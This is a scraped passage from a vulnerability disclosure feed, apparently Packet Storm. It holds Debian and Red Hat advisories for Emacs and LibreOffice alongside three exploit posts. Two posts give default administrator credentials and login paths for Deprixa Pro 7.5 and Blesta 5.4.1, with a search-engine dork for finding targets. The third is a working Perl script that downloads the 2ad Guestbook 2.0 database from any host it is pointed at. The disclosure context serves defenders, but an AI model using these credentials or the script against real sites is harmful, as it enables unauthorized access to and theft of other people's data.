gDRd3jRu7bvPJ12Jds/fsnTQ43UtFlNhRj00mTaXdEMOvGWzEH1VEI3Xw97+7FyZ  
vemkyDANWfU=  
=YQE9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0103-01

Deprixa Pro version 7.5 appears to leave a default administrative account in place post installation.

    ====================================================================================================================================| # Title     : DEPRIXA Pro V7.5 Insecure Settings Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://deprixacargo.link/                                                                                         |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin & pass=09731 [+] https://127.0.0.1/deprixaprosite/demo/login.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Deprixa Pro 7.5 Insecure Settings

Blesta version 5.4.1 appears to leave a default administrative account in place post installation.

    ====================================================================================================================================| # Title     : blesta 5.4.1 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://account.blesta.com/client/plugin/download_manager/client_main/download/209/blesta-5.4.1.zip                |  | # Dork      : Powered by Blesta, © Phillips Data, Inc.                                                                           |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin & pass=password [+] https://127.0.0.1/blesta/admin/login/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Blesta 5.4.1 Insecure Settings

Debian Linux Security Advisory 5314-1 - It was discovered that missing input sanitising in the ctags functionality of Emacs may result in the execution of arbitrary shell commands.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5314-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
January 11, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : emacs  
CVE ID         : CVE-2022-45939  
Debian Bug     : 1025009

It was discovered that missing input sanitising in the ctags functionality  
of Emacs may result in the execution of arbitrary shell commands.

For the stable distribution (bullseye), this problem has been fixed in  
version 1:27.1+1-3.1+deb11u1.

We recommend that you upgrade your emacs packages.

For the detailed security status of emacs please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/emacs

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmO/Bk8ACgkQEMKTtsN8  
TjYecBAAsKhcrCNNMAymVbFW1PhpPWkp6KVpYbbj/vGnfeJCTTUnilZqirvHMXnI  
of4dhj9qCsmzB3tSFzEXuo/ek475XY3qig2t6vJJzlARiDHaBuU7R0z39LifcaNE  
EO8ByAnMilxZjqOv7qgobG0wUmXzWlJT8SuGK5OXbnPH27++7W26YW1ccsSSjn0l  
m3aKlWiMsKABmaj7NfqY+dauDI/t+MOg85bXDNrjJsO8SLfCcWZiDtb0qbvHarNk  
1T+yMPPFARSvM4KIvrUx0ENxjUuvugUtJqjcK9Prp27WB3kn8y387H+Y5SOFQSOy  
cSqrlWcO9ZUfjuDmyKP3kEkg8wDrKI2E4F1oTZpu+Xz44ysueE6nK62b/G+FY4vO  
pVqrWAE1bILyuGyhM/U4/PkpwGyC5je3cIFnyjigtUH3citcpyW8r8uvBqn20ARc  
12hsMD8PgQNt7xOm69+Ksf0oRyPJzMPjqQfjwWOwbnviPLBeq0CwxQZPECumzj87  
nkOAWjAvPqrCtHdO945XIsbyk1sM+TLIe+gGFPxYniVfyp8TXWz/DcyepciZ+aqB  
N3aoL4CB65JpHtq9SovdbFPRoG1hrvzfqWmiaYw9+/FO1nCe6PcC5lK1f6yr/E0T  
I0iy4CwqoCtuPk+jHG9xXjxqt2Ylo514R8CvHdHri+HhSLj8QaA=  
=gd6B  
-----END PGP SIGNATURE-----

Debian Security Advisory 5314-1

Red Hat Security Advisory 2023-0089-01 - LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite. Issues addressed include a script execution vulnerability.

Red Hat Security Advisory 2023-0089-01

2ad Guestbook version 2.0 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : 2ad guestbook version 2.0 Database Disclosure Exploit                                                              |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://www.2ad.free.fr                                                                                             |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (livre-or.mdbsmdb.mdb ) file  
    The (livre-or.mdbsmdb.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# 2ad guestbook version 2.0 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor :  http://www.2ad.free.fr

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print "\n[+] 2ad guestbook version 2.0 Database Disclosure Exploit [+] \n\n";  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="db/livre-or.mdbsmdb.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/livre-or.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/livre-or.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

Source

Packet Storm